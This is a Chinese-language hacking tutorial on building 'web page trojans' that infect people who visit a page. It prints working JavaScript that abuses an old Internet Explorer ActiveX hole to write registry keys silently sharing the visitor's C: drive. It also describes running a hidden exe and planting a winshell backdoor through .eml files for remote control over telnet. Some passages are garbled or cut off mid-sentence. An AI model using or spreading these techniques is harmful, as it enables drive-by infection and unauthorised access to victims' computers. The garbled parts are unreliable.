制作網頁木馬

大家對木馬都不陌生了，它可能要算是計算機病毒史上最厲害的了，相信會使木馬的人千千萬萬，但是有很多人苦於怎麼把木馬發給對方，現在隨著計算機的普及，在網絡上我相信很少有人會再輕易的接收對方的文件了，所以網頁木馬誕生了。
1.它應該算是html帶動同路徑下的一個exe的文件的主頁了，也就是當浏覽器浏覽這個頁面的時候，一個exe的文件就在後台自動下載並執行了，可以做一個test.html的文件在桌面，內容如下：

再在桌面下隨便找個exe的文件，名字一定要改為tset.exe，好了，這時候雙擊我們剛才生成的html文件，當看到“網頁加載中，請稍後....”的時候，我們的那個同路徑下的exe文件也被無條件執行了，這種頁面的優點就是編譯修改簡單，但是！當你申請下了一個個人主頁空間的時候，把這兩個文件上傳上去的時候，當你試圖通過浏覽器浏覽你的傑作的時候，ie的安全警告跳了出來，我想沒有幾個人願意乖乖的冒著風險去點“是”，好了，盡管這個網頁木馬在本地是多麼的完美，但是放到了網上就通不過ie的安全策略了，這個小馬失敗了。
2.是通過ie自身的漏洞寫入注冊表，相信很多人經常在浏覽一些主頁的時候，注冊表被改的亂七八糟、ie標題被改、首頁被改、注冊表編輯器被禁用等等，這些都是自動修改了你的注冊表的網頁的傑作，所以我門也可以做個頁面讓浏覽者的硬盤完全共享，也是做個html的文件，內容如下：
script language=javascript>
document.write("");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\RWC$\\Path","C:\\");
}
function init()
{
setTimeout("f()", 1000);
}
init();

當對方的浏覽過這個頁面的時候，他的c:就被共享了，共享後的進入方法嘛..呵呵不用說了吧，但是他雖然被共巷了，但是你還不知道誰正在看你的這個頁面，他的ip又是多少你都不知道，沒有關系，有個很簡單的方法，去163申請一個域名的轉換，如：http://dhj.126.com連接目標地址裡...褪槍蠶砹恿恕?/a>
這種網頁木馬的特點是比較安全，不宜被對方發現，但是使用麻煩需要牽扯到很多的東西。

3.也是現在最好用的一種了吧，個人認為。它是將一個小巧的exe文件作成一個.eml的文件，再用ie的漏洞讓一個html的頁面執行這個.eml的文件，你的那個小巧的exe文件就被執行了，由於代碼過長又因每個exe文件轉換後的代碼不同所以不可能一一寫出，下面給出一個地址http://dhj.126.com實際上就是一個轉...憧梢醞ü齮elnet x.x.x.x 3389來完全控制對方（這個5k的小後門是winshell5.0黑白網絡有下，同時這個winshell5.0還有一個很出色的功能，就是能下載一個你事先設置好的指定路徑下的一個文件，並執行他，我放置的是網絡深偷，如果你的殺毒軟件夠厲害的話，神偷是可以被查出來的，這裡只是實驗，實際中可以指定很多查不到的小馬，這裡不闡述），有興趣的朋友可以來試試。
這種網頁木馬的特點是，對方挨種率較高，除了制作麻煩一點外，沒有什麼缺點啦
好了所有的漏洞都是建立在系統漏洞的前提下，多升級多打補丁沒有壞處